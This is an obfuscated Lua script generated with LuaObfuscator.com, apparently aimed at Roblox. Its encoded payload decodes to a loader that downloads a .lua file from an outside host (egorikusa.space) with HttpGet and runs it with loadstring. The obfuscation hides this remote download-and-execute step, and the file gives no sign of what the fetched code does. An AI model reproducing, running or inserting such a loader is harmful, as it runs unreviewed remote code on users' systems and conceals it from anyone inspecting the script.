--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=v2(v0(v30,16));if v19 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v83,v19);v19=nil;v90=1;end end else return v83;end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/((5 -3)^(v32-(932 -(857 + 74)))))%((5 -3)^(((v33-(569 -(367 + 201))) -(v32-(928 -(214 + 713)))) + (1 -0))) ;return v84-(v84%(1 + 0)) ;else local v85=877 -(282 + 595) ;local v86;while true do if (v85==(0 -0)) then v86=(2 + (117 -(32 + 85)))^(v32-(1 -0)) ;return (((v31%(v86 + v86))>=v86) and ((2699 -2079) -(544 + 11 + 64))) or ((282 + 988) -(226 + 1044)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=957 -((1072 -(67 + 113)) + 65) ;local v36;local v37;while true do if (v35==0) then v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + 2 + 0 ;v35=1 -0 ;end if (v35==(1 -0)) then return (v37 * (606 -(87 + 263))) + v36 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + ((12 -5) -4) );v18=v18 + 3 + 1 ;return (v41 * ((48536242 + 18144589) -(49904612 -(915 + 82)))) + (v40 * (66488 -(802 + 150))) + (v39 * (689 -433)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=2 -(1139 -(116 + 1022)) ;local v45=(v20(v43,1 + 0 ,26 -6 ) * ((1189 -(1069 + 118))^(72 -40))) + v42 ;local v46=v20(v43,21,67 -(149 -113) );local v47=((v20(v43,6 + 26 )==(1 -0)) and  -(1 + 0)) or (1 + 0) ;if (v46==(791 -(368 + 423))) then if (v45==((0 + 0) -0)) then return v47 * (18 -(10 + 8)) ;else local v92=0 -(0 -0) ;while true do if (v92==(442 -(416 + 26))) then v46=3 -2 ;v44=0 + (0 -0) ;break;end end end elseif (v46==(3621 -1574)) then return ((v45==(438 -(145 + 293))) and (v47 * (1/0))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((432 -((816 -(201 + 571)) + 386))^(1538 -(998 + (1347 -(814 + 45))))))) ;end local function v25(v48) local v49;if  not v48 then local v87=0;while true do if (v87==(0 -0)) then v48=v23();if (v48==(0 + 0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(1 + (0 -0)) );v18=v18 + v48 ;local v50={};for v65=886 -((1341 -(1020 + 60)) + 624) , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0 -0 ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v67=(function() return 0;end)();while true do if (v67==0) then if (v51~=(2 -0)) then else v56[ #"-19"]=(function() return v21();end)();for v103= #"}",v23() do local v104=(function() return v21();end)();if (v20(v104, #"{", #"}")==0) then local v106=(function() return 0;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (v106==(1384 -(746 + 638))) then local v116=(function() return 0 + 0 ;end)();local v117=(function() return;end)();while true do if (v116~=0) then else v117=(function() return 0 -0 ;end)();while true do if ((342 -(218 + 123))~=v117) then else v106=(function() return 1582 -(1535 + 46) ;end)();break;end if (0==v117) then v107=(function() return 0 + 0 ;end)();v108=(function() return nil;end)();v117=(function() return 1 + 0 ;end)();end end break;end end end if (v106==2) then while true do if (v107== #",") then local v159=(function() return 0;end)();local v160=(function() return;end)();while true do if (v159==(560 -(306 + 254))) then v160=(function() return 0 + 0 ;end)();while true do if (v160~=(1 -0)) then else v107=(function() return 1469 -(899 + 568) ;end)();break;end if (v160==(0 + 0)) then v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==(603 -(268 + 335))) then local v180=(function() return 290 -(60 + 230) ;end)();local v181=(function() return;end)();while true do if (v180~=0) then else v181=(function() return 572 -(426 + 146) ;end)();while true do if (v181~=(0 + 0)) then else v110[ #"xxx"]=(function() return v22();end)();v110[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v108== #"/") then v110[ #"19("]=(function() return v23();end)();elseif (v108==(1458 -(282 + 1174))) then v110[ #"xxx"]=(function() return v23() -((813 -(569 + 242))^(46 -30)) ;end)();elseif (v108== #"gha") then local v188=(function() return 0;end)();local v189=(function() return;end)();while true do if (v188==0) then v189=(function() return 0 + 0 ;end)();while true do if (v189~=0) then else v110[ #"-19"]=(function() return v23() -((1026 -(706 + 318))^16) ;end)();v110[ #"0313"]=(function() return v22();end)();break;end end break;end end end v160=(function() return 1;end)();end end break;end end end if ((1251 -(721 + 530))~=v107) then else local v161=(function() return 1271 -(945 + 326) ;end)();while true do if (v161~=(2 -1)) then else v107=(function() return  #"|";end)();break;end if (v161~=(0 + 0)) then else v108=(function() return v20(v104,702 -(271 + 429) , #"gha");end)();v109=(function() return v20(v104, #"?id=",6 + 0 );end)();v161=(function() return 1;end)();end end end if (v107==2) then local v162=(function() return 1500 -(1408 + 92) ;end)();local v163=(function() return;end)();while true do if (v162==(1086 -(461 + 625))) then v163=(function() return 1288 -(993 + 295) ;end)();while true do if (v163==(0 + 0)) then if (v20(v109, #",", #"\\")~= #"|") then else v110[2]=(function() return v58[v110[1173 -(418 + 753) ]];end)();end if (v20(v109,1 + 1 ,2)== #"]") then v110[ #"xnx"]=(function() return v58[v110[ #"xxx"]];end)();end v163=(function() return 1 + 0 ;end)();end if (v163==1) then v107=(function() return  #"91(";end)();break;end end break;end end end if (v107~= #"-19") then else if (v20(v109, #"nil", #"91(")== #"<") then v110[ #"0313"]=(function() return v58[v110[ #"?id="]];end)();end v53[v103]=(function() return v110;end)();break;end end break;end if (v106~=1) then else local v118=(function() return 0 + 0 ;end)();while true do if (v118==(0 + 0)) then v109=(function() return nil;end)();v110=(function() return nil;end)();v118=(function() return 530 -(406 + 123) ;end)();end if (v118==1) then v106=(function() return 2;end)();break;end end end end end end for v105= #"!",v23() do v54,v105,v28=(function() return v52(v54,v105,v28);end)();end return v56;end if (1==v51) then local v100=(function() return 1769 -(1749 + 20) ;end)();local v101=(function() return;end)();while true do if (v100==0) then v101=(function() return 0;end)();while true do if (v101==(1 + 0)) then v58=(function() return {};end)();for v119= #"{",v57 do local v120=(function() return 1322 -(1249 + 73) ;end)();local v121=(function() return;end)();local v122=(function() return;end)();local v123=(function() return;end)();while true do if (v120~=(1 + 0)) then else v123=(function() return nil;end)();while true do if (1==v121) then if (v122== #"<") then v123=(function() return v21()~=(1145 -(466 + 679)) ;end)();elseif (v122==2) then v123=(function() return v24();end)();elseif (v122== #"xnx") then v123=(function() return v25();end)();end v58[v119]=(function() return v123;end)();break;end if (v121~=(0 -0)) then else local v178=(function() return 0;end)();local v179=(function() return;end)();while true do if (v178==(0 -0)) then v179=(function() return 0;end)();while true do if (v179~=(1901 -(106 + 1794))) then else v121=(function() return 1;end)();break;end if (v179==0) then v122=(function() return v21();end)();v123=(function() return nil;end)();v179=(function() return 1;end)();end end break;end end end end break;end if (v120==(0 + 0)) then v121=(function() return 0;end)();v122=(function() return nil;end)();v120=(function() return 1;end)();end end end v101=(function() return 2;end)();end if (v101==(0 + 0)) then v56=(function() return {v53,v54,nil,v55};end)();v57=(function() return v23();end)();v101=(function() return 1;end)();end if (v101==(5 -3)) then v51=(function() return 116 -(4 + 110) ;end)();break;end end break;end end end v67=(function() return 1;end)();end if (v67==1) then if (v51==(584 -(57 + 527))) then local v102=(function() return 1427 -(41 + 1386) ;end)();while true do if (v102==(105 -(17 + 86))) then v51=(function() return 1;end)();break;end if (v102==1) then v54=(function() return {};end)();v55=(function() return {};end)();v102=(function() return 2;end)();end if (v102~=0) then else v52=(function() return function(v111,v112,v113) local v114=(function() return 0;end)();local v115=(function() return;end)();while true do if (v114==(0 + 0)) then v115=(function() return 0 -0 ;end)();while true do if (v115==(0 -0)) then v111[v112-#"~" ]=(function() return v113();end)();return v111,v112,v113;end end break;end end end;end)();v53=(function() return {};end)();v102=(function() return 167 -(122 + 44) ;end)();end end end break;end end end end local function v29(v59,v60,v61) local v62=v59[1 -0 ];local v63=v59[6 -4 ];local v64=v59[3 + 0 ];return function(...) local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=1 + 0 ;local v73= -(1 -0);local v74={};local v75={...};local v76=v12("#",...) -(66 -(30 + 35)) ;local v77={};local v78={};for v88=0 + 0 ,v76 do if ((4853>=2982) and (v88>=v70)) then v74[v88-v70 ]=v75[v88 + 1 ];else v78[v88]=v75[v88 + (1258 -(1043 + 214)) ];end end local v79=(v76-v70) + (3 -2) ;local v80;local v81;while true do local v89=(3187 -(1913 + 62)) -(323 + 889) ;while true do if ((4134>3357) and (v89==(2 -1))) then if ((v81<=(588 -(361 + 219))) or (3417<2534)) then if (v81<=(323 -(53 + 267))) then if (v81<=(1 + 0)) then if (v81==0) then local v124=v80[415 -(15 + 398) ];local v125,v126=v71(v78[v124](v13(v78,v124 + ((620 + 363) -(18 + 964)) ,v80[11 -(20 -12) ])));v73=(v126 + v124) -1 ;local v127=(1933 -(565 + 1368)) + 0 ;for v153=v124,v73 do v127=v127 + 1 ;v78[v153]=v125[v127];end else v78[v80[2 + 0 ]]();end elseif (v81==((1068 -(42 + 174)) -(20 + 830))) then local v128=v80[2 + 0 ];local v129=v78[v80[129 -(116 + 10) ]];v78[v128 + 1 + 0 ]=v129;v78[v128]=v129[v80[742 -(542 + 196) ]];else local v133=0 -0 ;local v134;while true do if (v133==(0 + 0)) then v134=v80[2];v78[v134]=v78[v134](v13(v78,v134 + 1 + 0 ,v73));break;end end end elseif (v81<=(2 + 3)) then if (v81>((8 + 2) -6)) then do return;end else v78[v80[4 -2 ]]=v61[v80[1554 -(933 + 193 + 425) ]];end elseif ((v81<=6) or (2722<=164)) then v78[v80[407 -(118 + 287) ]]=v80[3];elseif ((v81>7) or (2408<2109)) then v78[v80[7 -5 ]]={};else v78[v80[1123 -(51 + 67 + (2507 -(363 + 1141))) ]]={};end elseif ((v81<=(35 -23)) or (33==1455)) then if ((v81<=(387 -(142 + 235))) or (443>=4015)) then if ((3382>166) and (v81>(1670 -(1477 + 184)))) then local v139=0 -0 ;local v140;local v141;while true do if (v139==(1 + 0)) then v78[v140 + (978 -(553 + 424)) ]=v141;v78[v140]=v141[v80[4]];break;end if (v139==(0 -0)) then v140=v80[2 + 0 ];v141=v78[v80[3 + 0 ]];v139=1 + 0 ;end end else v78[v80[1 + (1581 -(1183 + 397)) ]]=v61[v80[2 + 1 ]];end elseif (v81>(23 -12)) then local v144=v80[5 -3 ];local v145,v146=v71(v78[v144](v13(v78,v144 + 1 ,v80[6 -3 ])));v73=(v146 + v144) -(1 + 0) ;local v147=0 -0 ;for v156=v144,v73 do v147=v147 + ((1027 -273) -(223 + 16 + 514)) ;v78[v156]=v145[v147];end else local v148=v80[1 + 1 ];v78[v148]=v78[v148](v13(v78,v148 + (1330 -((1653 -(564 + 292)) + 532)) ,v73));end elseif ((v81<=((18 -7) + 3)) or (280==3059)) then if ((1881>1293) and (v81==(5 + 8))) then v78[v80[2]]();else v78[v80[(11 -7) -2 ]]=v80[1205 -((677 -(244 + 60)) + 829) ]~=(731 -(476 + 255)) ;end elseif ((2357==2357) and (v81<=(45 -30))) then v78[v80[1132 -(369 + 761) ]]=v80[2 + 0 + (477 -(41 + 435)) ];elseif (v81==(28 -12)) then v78[v80[(3 + 0) -1 ]]=v80[(181 + 60) -(64 + (1175 -(938 + 63))) ]~=0 ;else do return;end end v72=v72 + 1 + 0 ;break;end if (v89==((0 + 0) -(1125 -(936 + 189)))) then v80=v68[v72];v81=v80[1];v89=337 -(144 + 192) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403343Q00682Q7470733A2Q2F65676F72696B7573612E73706163652F343637626437636235666463312Q663738626463386237622E6C7561000A4Q00077Q001204000100013Q001204000200023Q00200200020002000300120F000400044Q0010000500016Q000200054Q000300013Q00022Q000D0001000100012Q00113Q00017Q00",v9(),...);
